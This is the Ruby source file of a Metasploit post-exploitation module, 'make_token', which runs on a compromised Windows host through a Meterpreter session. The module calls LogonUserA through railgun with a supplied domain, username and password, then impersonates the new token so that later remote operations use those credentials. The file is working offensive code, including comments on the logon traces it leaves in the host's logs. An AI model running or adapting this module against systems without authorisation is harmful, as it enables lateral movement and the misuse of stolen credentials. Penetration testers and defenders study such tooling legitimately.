Path: blob/master/modules/post/windows/manage/make_token.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Make Token Command',
        'Description' => %q{
          In its default configuration, this module creates a new network security context with the specified
          logon data (username, domain and password). Under the hood, Meterpreter's access token is cloned, and
          a new logon session is created and linked to that token. The token is then impersonated to acquire
          the new network security context. This module has no effect on local actions - only on remote ones
          (where the specified credential material will be used). This module does not validate the credentials
          specified.
        },
        'License' => MSF_LICENSE,
        'Notes' => {
          'AKA' => ['make_token', 'maketoken'],
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # The LogonUser call itself is what leaves traces on the host.
          'SideEffects' => [IOC_IN_LOGS]
        },
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Author' => [
          'Daniel López Jiménez (attl4s)',
          'Simone Salucci (saim1z)'
        ],
        # Every Meterpreter command `run` relies on, so the framework can refuse
        # to run against a server that lacks one of them.
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_railgun_api
              stdapi_sys_config_revert_to_self
              stdapi_sys_config_update_token
            ]
          }
        }
      )
    )

    register_options(
      [
        OptString.new('DOMAIN', [true, 'Domain to use']),
        OptString.new('USERNAME', [true, 'Username to use']),
        OptString.new('PASSWORD', [true, 'Password to use'])
      ]
    )

    # LOGONTYPE is advanced on purpose: anything other than NEW_CREDENTIALS
    # changes the local identity as well and can break the session.
    register_advanced_options(
      [
        OptEnum.new('LOGONTYPE', [true, 'The type of logon operation to perform. Using LOGON32_LOGON_INTERACTIVE may cause issues within the session (typically due to the token filtering done by the UserAccountControl mechanism in Windows). Use with caution', 'LOGON32_LOGON_NEW_CREDENTIALS', ['LOGON32_LOGON_BATCH', 'LOGON32_LOGON_INTERACTIVE', 'LOGON32_LOGON_NETWORK', 'LOGON32_LOGON_NETWORK_CLEARTEXT', 'LOGON32_LOGON_NEW_CREDENTIALS', 'LOGON32_LOGON_SERVICE', 'LOGON32_LOGON_UNLOCK']])
      ]
    )
  end

  # Entry point. Drops any impersonation already active in the session, asks
  # the target to create a new logon session for DOMAIN\USERNAME with PASSWORD
  # through LogonUserA, and hands the resulting token to the Meterpreter server.
  # With the default LOGON32_LOGON_NEW_CREDENTIALS type nothing here checks that
  # the password is right: a wrong one only surfaces on the first remote access.
  def run
    # Belt-and-braces on top of SessionTypes: railgun and the token commands
    # used below only exist on Meterpreter sessions.
    unless session.type == 'meterpreter'
      fail_with(Failure::BadConfig, 'This module requires a Meterpreter session')
    end

    logontype = datastore['LOGONTYPE']
    domain = datastore['DOMAIN']
    user = datastore['USERNAME']

    drop_existing_impersonation
    result = logon_as(user, domain, datastore['PASSWORD'], logontype)

    unless result['return']
      print_error("LogonUserA call failed, Error Code: #{result['GetLastError']} - #{result['ErrorMessage']}")
      return
    end

    adopt_token(result['phToken'])

    # Only NEW_CREDENTIALS leaves the local identity untouched, so remind the
    # operator that getuid will not reflect the new context.
    return unless logontype == 'LOGON32_LOGON_NEW_CREDENTIALS'

    print_warning('Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)')
  end

  private

  # rev2self first, so the new token replaces rather than stacks on whatever
  # impersonation the session was already running with.
  def drop_existing_impersonation
    print_status('Executing rev2self to revert any previous token impersonations')
    session.sys.config.revert_to_self
  end

  # Wraps the railgun LogonUserA call and returns railgun's result hash
  # ('return', 'phToken', 'GetLastError', 'ErrorMessage').
  #
  # The password is passed to the target as a cleartext argument of the call;
  # the status line deliberately prints only the logon type and DOMAIN\user.
  # The trailing 4 is presumably the out-buffer size railgun expects for the
  # phToken parameter — check railgun's LogonUserA definition if token handles
  # ever come back truncated on a given architecture.
  # NOTE(review): a LogonUser call is expected to leave a logon event in the
  # host's Security log (that is what IOC_IN_LOGS refers to); confirm the exact
  # event id and logon type before relying on this for OPSEC decisions.
  def logon_as(user, domain, password, logontype)
    print_status("Executing LogonUserA with the flag #{logontype} to create a new security context for #{domain}\\#{user}")
    session.railgun.advapi32.LogonUserA(user, domain, password, logontype, 'LOGON32_PROVIDER_DEFAULT', 4)
  end

  # Stores the new token handle in the Meterpreter server so that subsequent
  # remote operations run under the new security context.
  def adopt_token(ph_token)
    print_status('Impersonating the new security context...')
    session.sys.config.update_token(ph_token)
    print_good('The session should now run with the new security context!')
  end
end